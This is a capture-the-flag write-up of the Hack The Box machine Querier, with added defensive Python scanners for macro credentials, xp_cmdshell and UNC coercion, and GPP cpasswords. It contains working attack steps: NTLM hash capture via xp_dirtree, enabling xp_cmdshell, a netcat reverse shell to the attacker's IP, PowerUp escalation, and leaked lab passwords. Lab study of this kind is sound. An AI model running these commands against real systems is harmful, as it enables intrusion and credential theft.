Querier-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: anonymous SMB access, credential leakage from an Excel macro file, NTLMv2 capture triggered from MSSQL, xp_cmdshell, hosting your own SMBv2 share, PowerUp.ps1, Groups.xml password leakage, Rotten Potato privilege escalation

Reference links: none

0x01 Getting user access

1. Get the target IP address: 10.10.10.125

2. Enumerate the open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.125
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-24 18:43 CST
Warning: 10.10.10.125 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.125
Host is up (0.43s latency).
Not shown: 64702 closed tcp ports (reset), 819 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 28.52 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
135,139,445,1433,5985,47001,49664,49665,49666,49667,49668,49669,49670,49671,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p135,139,445,1433,5985,47001,49664,49665,49666,49667,49668,49669,49670,49671 -sV -sC --min-rate=10000 10.10.10.125
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-24 18:44 CST
Nmap scan report for 10.10.10.125
Host is up (0.40s latency).

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2024-05-24T02:40:54+00:00; -8h04m54s from scanner time.
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-05-24T02:29:11
|_Not valid after: 2054-05-24T02:29:11
| ms-sql-ntlm-info:
| 10.10.10.125:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -8h04m55s, deviation: 1s, median: -8h04m55s
| smb2-time:
| date: 2024-05-24T02:40:38
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.45 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.10.125 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-24 18:47 CST
Warning: 10.10.10.125 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.125
Host is up (0.40s latency).
All 65535 scanned ports on 10.10.10.125 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 76.11 seconds

3. Enumeration shows that the SMB service allows anonymous access:

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L \\10.10.10.125 -N

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reports Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.125\\Reports -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jan 29 07:23:48 2019
.. D 0 Tue Jan 29 07:23:48 2019
Currency Volume Report.xlsm A 12229 Mon Jan 28 06:21:34 2019

5158399 blocks of size 4096. 851722 blocks available
smb: \> get "Currency Volume Report.xlsm"
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (5.0 KiloBytes/sec) (average 5.0 KiloBytes/sec)
smb: \>

4. An .xlsm file was found here; this extension normally means a macro-enabled workbook. A quick look at its metadata reveals a username:

┌──(kali㉿offsec)-[~/Desktop]
└─$ exiftool ./Currency\ Volume\ Report.xlsm
ExifTool Version Number : 12.70
File Name : Currency Volume Report.xlsm
Directory : .
File Size : 12 kB
File Modification Date/Time : 2024:05:24 19:01:37+08:00
File Access Date/Time : 2024:05:24 19:03:54+08:00
File Inode Change Date/Time : 2024:05:24 19:01:37+08:00
File Permissions : -rw-r--r--
File Type : XLSM
File Type Extension : xlsm
MIME Type : application/vnd.ms-excel.sheet.macroEnabled.12
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x513599ac
Zip Compressed Size : 367
Zip Uncompressed Size : 1087
Zip File Name : [Content_Types].xml
Creator : Luis
Last Modified By : Luis
Create Date : 2019:01:21 20:38:56Z
Modify Date : 2019:01:27 22:21:34Z
Application : Microsoft Excel
Doc Security : None
Scale Crop : No
Heading Pairs : Worksheets, 1
Titles Of Parts : Currency Volume
Company :
Links Up To Date : No
Shared Doc : No
Hyperlinks Changed : No

5. Opening the macro-enabled workbook shows no macro at all; only after unzipping the archive and running strings on vbaProject.bin does some information appear:

shiyan@InfoSec xl % strings vbaProject.bin
macro to pull data for client volume reports
n.Conn]
Open
rver=<
SELECT * FROM volume;
word>
MsgBox "connection successful"
Set rs = conn.Execute("SELECT * @@version;")
Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
further testing required
Attribut
e VB_Nam
e = "Thi
sWorkboo
0{00020P819-
$0046}
.........................
1Bxq
Sheet1G
S@#e@Xt
ThisWorkbook
Sheet1
ID="{7819C482-CC73-4FB3-8245-31BB2E19C38A}"
Document=ThisWorkbook/&H00000000
Document=Sheet1/&H00000000
HelpFile=""
Name="VBAProject"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="191BC9EFCDEFCDEFCDEFCD"
DPB="8D8F5D2BA59EA69EA69E"
GC="0103D1D2D2D2D22D"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisWorkbook=26, 26, 1062, 609, C
Sheet1=52, 52, 1088, 635, C
shiyan@InfoSec xl %

6. From this it is clear that the script is used to connect to a database:

Set rs = conn.Execute("SELECT * @@version;")
Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
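The strings pass in steps 5 and 6 works here because long VBA string literals often survive the MS-OVBA compression that Office applies to module source, so the ODBC connection string sits in vbaProject.bin in the clear. The following Python script is an added example, not the author's tooling or anything from the box: it automates that audit for a defender who wants to sweep shared drives for macro workbooks carrying database credentials. It opens the .xlsm as the zip package it is, runs a strings(1)-style extraction over every part, parses anything that looks like a Key=Value;... connection string, and reports hits with the secret redacted. The workbook it scans is constructed in memory, and the password inside it is a made-up placeholder, not the value found on the box. For a robust scan of real-world macros, decompress the VBA source (as olevba does) rather than relying on literals surviving compression.

```python
"""Audit a macro-enabled workbook (.xlsm) for embedded database credentials.

Added example for this write-up, not the author's tooling. It automates the
manual step above (unzip the OOXML package, run strings over vbaProject.bin)
and reports ODBC-style connection strings that carry a password key, with the
secret itself redacted so the report does not become a second leak.
"""
import io
import re
import zipfile

# Connection-string keys that hold a secret (compared case-insensitively).
SECRET_KEYS = {"pwd", "password"}


def extract_strings(blob: bytes, min_len: int = 4) -> list[str]:
    """Return printable-ASCII runs of at least min_len bytes, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def parse_connection_string(text: str) -> dict[str, str]:
    """Split 'Key=Value;Key2=Value2' into a dict with lower-cased keys."""
    parts: dict[str, str] = {}
    for chunk in text.split(";"):
        key, sep, value = chunk.partition("=")
        if sep:
            parts[key.strip().lower()] = value.strip()
    return parts


def find_credential_leaks(xlsm_bytes: bytes) -> list[dict]:
    """Scan every part of the zip package for connection strings with a password.

    Each finding names the part, server, database and user, and gives only the
    length of the secret, never its value.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as package:
        for name in package.namelist():
            for s in extract_strings(package.read(name)):
                if "=" not in s or ";" not in s:
                    continue  # cheap pre-filter before parsing
                kv = parse_connection_string(s)
                hit = SECRET_KEYS.intersection(kv)
                if not hit:
                    continue
                findings.append({
                    "part": name,
                    "server": kv.get("server"),
                    "database": kv.get("database"),
                    "user": kv.get("uid") or kv.get("user id"),
                    "secret_keys": sorted(hit),
                    "secret_length": max(len(kv[k]) for k in hit),
                })
    return findings


def build_sample_xlsm() -> bytes:
    """Constructed stand-in for the workbook: a zip with a fake vbaProject.bin.

    The password below is a made-up placeholder, not the value from the box.
    """
    conn = (b"Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;"
            b"Database=volume;Uid=reporting;Pwd=ExamplePassw0rd!")
    vba_bin = (b"\x01\x16\x03\x00" + b"macro to pull data for client volume reports"
               + b"\x00\x00\x02" + b"SELECT * FROM volume;" + b"\x00\x1f"
               + conn + b"\x00\x00\x05" + b"further testing required\x00")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as package:
        package.writestr("[Content_Types].xml",
                         '<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Types/>')
        package.writestr("xl/vbaProject.bin", vba_bin)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in find_credential_leaks(build_sample_xlsm()):
        print(finding)
```

Run against a real workbook by passing the file's bytes to find_credential_leaks(). Any hit is a reason to rotate the credential, not just to remove the file: the password has already been on an anonymously readable share.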

7. Try logging in to the database with impacket-mssqlclient:

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-mssqlclient reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL (QUERIER\reporting reporting@volume)> EXEC xp_dirtree '\\10.10.14.45\share'
subdirectory depth
------------ -----
SQL (QUERIER\reporting reporting@volume)>

8. Retrying the xp_dirtree call with Responder listening, an NTLMv2 hash is captured:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo responder -I tun0 -w -d
[sudo] kali 的密码:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[SMB] NTLMv2-SSP Client : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:4d2c8f6e0e94bb2b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

9. Cracking the hash yields the account password:

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "ntlmv2"
5600 | NetNTLMv2 | Network Protocol
27100 | NetNTLMv2 (NT) | Network Protocol

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
[sudo] kali 的密码:
hashcat (v6.2.6) starting
.........

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

MSSQL-SVC::QUERIER:4d2c8f6e0e94bb2b:b2486f004b7b45eefdc992f4413fc10a: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:corporate568

.......
Stopped: Fri May 24 20:12:12 2024

10. Testing shows these credentials only work for the database login, but the account has sa-level privileges, so the xp_cmdshell module can be used:

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-mssqlclient mssql-svc:'corporate568'@10.10.10.125 -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL (QUERIER\mssql-svc dbo@master)> SELECT IS_SRVROLEMEMBER ('sysadmin');

-
1

SQL (QUERIER\mssql-svc dbo@master)> EXEC sp_configure 'Show Advanced Options', 1;
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (QUERIER\mssql-svc dbo@master)> reconfigure;
SQL (QUERIER\mssql-svc dbo@master)> sp_configure;
name minimum maximum config_value run_value
--------------------------------- ----------- ---------- ------------ ----------
......

xp_cmdshell 0 1 0 0

SQL (QUERIER\mssql-svc dbo@master)> EXEC sp_configure 'xp_cmdshell', 1
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (QUERIER\mssql-svc dbo@master)> reconfigure;
SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell "whoami"
output
-----------------
querier\mssql-svc

NULL

SQL (QUERIER\mssql-svc dbo@master)>
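Two things in steps 7 to 10 are visible to a defender from the database side. First, xp_dirtree (like xp_fileexist and xp_subdirs) accepts a UNC path and makes the SQL Server service account authenticate to that host over SMB, which is exactly how the mssql-svc NetNTLMv2 response ended up at Responder. Second, every sp_configure change is written to the SQL Server ERRORLOG with the same "Configuration option 'xp_cmdshell' changed from 0 to 1" text that mssqlclient echoed above. The Python below is an added example (not the author's tooling, not anything from the box) that checks both: a configuration-change line for a high-risk option flipping 0 to 1, and a captured statement calling a coercion-capable procedure with a UNC argument. The ERRORLOG lines and statements it scans are constructed to match those formats; the only values taken from the page are the procedure name, the share path and the message wording.

```python
"""Flag two SQL Server abuse patterns seen in this write-up.

Added example, not the author's tooling; log lines and statements below are
constructed. Pattern 1: extended procedures that accept a path and follow a
UNC path, which makes the SQL Server service account authenticate to that host
over SMB (the xp_dirtree step). Pattern 2: sp_configure enabling xp_cmdshell,
which SQL Server records in its ERRORLOG (the step above).
"""
import re
from dataclasses import dataclass
from typing import Optional

# Extended procedures that take a path argument and will follow UNC paths.
UNC_COERCION_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")

# sp_configure options whose 0 -> 1 change grants OS-level or outbound capability.
HIGH_RISK_OPTIONS = {"xp_cmdshell", "ole automation procedures", "ad hoc distributed queries"}

# Configuration-change text as it appears in the ERRORLOG (and echoed by mssqlclient).
_CONFIG_CHANGE_RE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)",
    re.IGNORECASE,
)
# A coercion-capable procedure followed by a quoted \\host\share... argument.
_UNC_CALL_RE = re.compile(
    r"\b(?P<proc>" + "|".join(UNC_COERCION_PROCS)
    + r")\b[^'\"]*['\"](?P<unc>\\\\[^\\'\"]+\\[^'\"]*)['\"]",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Alert:
    kind: str      # "config_enabled" or "unc_coercion"
    detail: str    # option name or procedure name, lower-cased
    evidence: str  # the matched text


def check_errorlog_line(line: str) -> Optional[Alert]:
    """Alert when a high-risk option flips 0 -> 1; 1 -> 0 and other options are ignored."""
    m = _CONFIG_CHANGE_RE.search(line)
    if not m:
        return None
    option = m.group("option").lower()
    if option in HIGH_RISK_OPTIONS and m.group("old") == "0" and m.group("new") == "1":
        return Alert("config_enabled", option, m.group(0))
    return None


def check_statement(sql: str) -> Optional[Alert]:
    """Alert when a coercion-capable procedure gets a UNC path; local paths do not alert."""
    m = _UNC_CALL_RE.search(sql)
    if not m:
        return None
    return Alert("unc_coercion", m.group("proc").lower(), m.group("unc"))


def scan(errorlog_lines, statements) -> list[Alert]:
    """Run both checks and return alerts in input order (ERRORLOG first)."""
    alerts = [a for a in map(check_errorlog_line, errorlog_lines) if a]
    alerts += [a for a in map(check_statement, statements) if a]
    return alerts


# Constructed samples shaped like ERRORLOG entries and captured batch text.
SAMPLE_ERRORLOG = [
    "2024-05-24 02:44:01.10 spid56      Configuration option 'show advanced options' "
    "changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-05-24 02:44:09.55 spid56      Configuration option 'xp_cmdshell' "
    "changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-05-24 03:10:00.00 spid56      Configuration option 'xp_cmdshell' "
    "changed from 1 to 0. Run the RECONFIGURE statement to install.",
]
SAMPLE_STATEMENTS = [
    "EXEC xp_dirtree '\\\\10.10.14.45\\share'",   # UNC path: outbound SMB authentication
    "EXEC xp_dirtree 'C:\\Windows\\Temp'",          # local path: benign
    "SELECT name FROM sys.databases",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_ERRORLOG, SAMPLE_STATEMENTS):
        print(alert)
```

The statement check needs a source of query text (SQL Server Audit or an Extended Events session capturing batches); the ERRORLOG check works on the log file alone. The corresponding hardening is the same on any instance: keep xp_cmdshell disabled, do not give reporting logins the sysadmin role, and block outbound TCP 445 from database servers so a coerced authentication has nowhere to go.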

11. Running a base64-encoded PowerShell reverse shell directly does not work here, so the only option seems to be downloading nc and using it for the reverse shell.

12. A first attempt shows that nc cannot be downloaded over the network; the antivirus flags it as malicious:

SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell "dir C:\Users"
output
----------------------------------------------------
Volume in drive C has no label.

Volume Serial Number is 35CB-DA81

NULL

Directory of C:\Users

NULL

01/29/2019 12:41 AM <DIR> .

01/29/2019 12:41 AM <DIR> ..

01/28/2019 11:17 PM <DIR> Administrator

01/29/2019 12:42 AM <DIR> mssql-svc

01/28/2019 11:17 PM <DIR> Public

0 File(s) 0 bytes

5 Dir(s) 3,472,916,480 bytes free

NULL

SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell "dir C:\Users\mssql-svc\Desktop"
output
--------------------------------------------------
Volume in drive C has no label.

Volume Serial Number is 35CB-DA81

NULL

Directory of C:\Users\mssql-svc\Desktop

NULL

01/29/2019 12:42 AM <DIR> .

01/29/2019 12:42 AM <DIR> ..

05/24/2024 03:29 AM 34 user.txt

1 File(s) 34 bytes

2 Dir(s) 3,472,916,480 bytes free

NULL

SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell "type C:\Users\mssql-svc\Desktop\user.txt"
output
--------------------------------
81a7d8f059cb2cb1da84c525c7eb46fd

NULL

SQL (QUERIER\mssql-svc dbo@master)>

SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell "powershell -c cd C:\Users\mssql-svc\Desktop; iwr -uri http://10.10.14.45/nc.exe -o ./nc.exe"
output
--------------------------------------------------------------------------------
At line:1 char:1

+ cd C:\Users\mssql-svc\Desktop; iwr -uri http://10.10.14.45/nc.exe -o ...

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This script contains malicious content and has been blocked by your antivirus software.

+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException

+ FullyQualifiedErrorId : ScriptContainedMaliciousContent



NULL

SQL (QUERIER\mssql-svc dbo@master)>

13. The flag can still be read, though. Next, try a different way of placing the file:

SQL (QUERIER\mssql-svc  dbo@master)> EXEC sp_configure 'Show Advanced Options', 1; 
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (QUERIER\mssql-svc dbo@master)> reconfigure;
SQL (QUERIER\mssql-svc dbo@master)> EXEC sp_configure 'xp_cmdshell', 1
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (QUERIER\mssql-svc dbo@master)> reconfigure;
SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell "copy \\10.10.14.45\share\nc.exe C:\Users\mssql-svc\Desktop\nc.exe"
output
-------------------------
1 file(s) copied.

NULL

SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell "C:\Users\mssql-svc\Desktop\nc.exe -e powershell 10.10.14.45 443"

14. Reverse shell obtained:

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.125] 49679
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
querier\mssql-svc
PS C:\Windows\system32>

15. This box really isn't easy; I was starting to wonder whether it expected me to do AV evasion...

0x02 Getting SYSTEM access

16. Upload PowerUp.ps1 to enumerate privilege-escalation paths:

PS C:\Windows\system32> cd C:\Users\mssql-svc\Desktop
cd C:\Users\mssql-svc\Desktop
PS C:\Users\mssql-svc\Desktop> ls
ls


Directory: C:\Users\mssql-svc\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/13/2005 10:53 AM 68608 nc.exe
-ar--- 5/24/2024 3:29 AM 34 user.txt


PS C:\Users\mssql-svc\Desktop> copy \\10.10.14.45\share\PowerUp.ps1 .
copy \\10.10.14.45\share\PowerUp.ps1 .
PS C:\Users\mssql-svc\Desktop> ls
ls


Directory: C:\Users\mssql-svc\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/13/2005 10:53 AM 68608 nc.exe
-a---- 4/20/2024 8:29 AM 600580 PowerUp.ps1
-ar--- 5/24/2024 3:29 AM 34 user.txt

17. Run the script and use its findings:

PS C:\Users\mssql-svc\Desktop> powershell -ep bypass
powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\mssql-svc\Desktop>

PS C:\Users\mssql-svc\Desktop> Import-Module ./PowerUp.ps1
Import-Module ./PowerUp.ps1
PS C:\Users\mssql-svc\Desktop>

PS C:\Users\mssql-svc\Desktop> Invoke-AllChecks
Invoke-AllChecks


Privilege : SeImpersonatePrivilege
Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2544
ProcessId : 4556
Name : 4556
Check : Process Token Privileges

ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True
Name : UsoSvc
Check : Modifiable Services

ModifiablePath : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

UnattendPath : C:\Windows\Panther\Unattend.xml
Name : C:\Windows\Panther\Unattend.xml
Check : Unattended Install Files

Changed : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File : C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Check : Cached GPP Files



PS C:\Users\mssql-svc\Desktop>
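The "Cached GPP Files" finding is the one that matters in step 17: a Group Policy Preferences item that set the local Administrator password left a cpassword attribute in Groups.xml, and PowerUp decrypts it with the key Microsoft published. MS14-025 stopped the editor from creating new items with passwords, but existing files in SYSVOL and in the client-side cache under C:\ProgramData\Microsoft\Group Policy\History are untouched. The Python below is an added example, not the author's tooling or PowerUp: it walks a directory tree for the preference file types that can carry cpassword and reports every non-empty occurrence with the account name and change date, without decrypting or printing the value, which is all that is needed to know which items to delete and which passwords to rotate. The SYSVOL-style tree it scans is constructed in a temporary directory, mirroring the GPO path from PowerUp's output; the cpassword inside it is a labelled placeholder.

```python
"""Find Group Policy Preference XML files that still carry a cpassword attribute.

Added example, not the author's tooling (PowerUp's "Cached GPP Files" check
decrypts the value; this scanner only reports presence, which is all a
defender needs to know which preference items to delete and which passwords
to rotate). The sample SYSVOL-style tree is constructed in a temp directory.
"""
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Preference files that could carry cpassword before MS14-025 removed the option.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}
# Attribute naming the account, which differs by preference type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def scan_gpp_tree(root: Path) -> list[dict]:
    """Walk root for GPP XML files and report every non-empty cpassword, value redacted."""
    findings = []
    for path in sorted(root.rglob("*.xml")):
        if path.name.lower() not in GPP_FILES:
            continue
        try:
            tree = ET.parse(path)
        except ET.ParseError:
            continue  # not well-formed XML; out of scope for this check
        # ElementTree has no parent pointers; build the map once per file.
        parent_of = {child: parent for parent in tree.iter() for child in parent}
        for elem in tree.iter():
            cpw = elem.attrib.get("cpassword", "")
            if not cpw:
                continue  # absent or empty: nothing to rotate
            item = parent_of.get(elem, elem)  # <Properties> sits under the item element
            account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), None)
            findings.append({
                "file": path.relative_to(root).as_posix(),
                "item": item.tag,
                "account": account,
                "changed": item.attrib.get("changed"),
                "cpassword_length": len(cpw),  # presence and size only, never the value
            })
    return findings


def build_sample_sysvol() -> Path:
    """Constructed tree mirroring the path PowerUp reported, with a placeholder cpassword."""
    root = Path(tempfile.mkdtemp(prefix="gpp_sample_"))
    prefs = root / "{31B2F340-016D-11D2-945F-00C04FB984F9}" / "Machine" / "Preferences"
    (prefs / "Groups").mkdir(parents=True)
    (prefs / "Groups" / "Groups.xml").write_text(
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<Groups>\n'
        '  <User name="Administrator" image="2" changed="2019-01-28 23:12:48">\n'
        '    <Properties action="U" newName="" cpassword="CONSTRUCTED_PLACEHOLDER_VALUE"\n'
        '                userName="Administrator" acctDisabled="0"/>\n'
        '  </User>\n'
        '</Groups>\n', encoding="utf-8")
    # A mapped-drive item with an empty cpassword: must not be reported.
    (prefs / "Drives").mkdir()
    (prefs / "Drives" / "Drives.xml").write_text(
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<Drives><Drive name="H:" changed="2019-01-28 23:13:00">'
        '<Properties action="U" path="\\\\fileserver\\home" cpassword="" userName=""/>'
        '</Drive></Drives>\n', encoding="utf-8")
    return root


if __name__ == "__main__":
    for finding in scan_gpp_tree(build_sample_sysvol()):
        print(finding)
```

Point scan_gpp_tree() at \\domain\SYSVOL\domain\Policies on a domain controller, or at the local Group Policy\History cache on a member host, to get the same list PowerUp would have worked from. Deleting the item is not enough on its own: any password that ever sat in a cpassword attribute has to be treated as disclosed and changed.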

18. The .xml file leaks the administrator's credentials directly. Try logging in with them:

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec administrator@10.10.10.125
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$
[*] Uploading file mhhfnebU.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service XOcr on 10.10.10.125.....
[*] Starting service XOcr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>

19. Now grab the final flag:

C:\Windows\system32> cd C:/Users/administrator/Desktop

C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 35CB-DA81

Directory of C:\Users\Administrator\Desktop

01/29/2019 01:04 AM <DIR> .
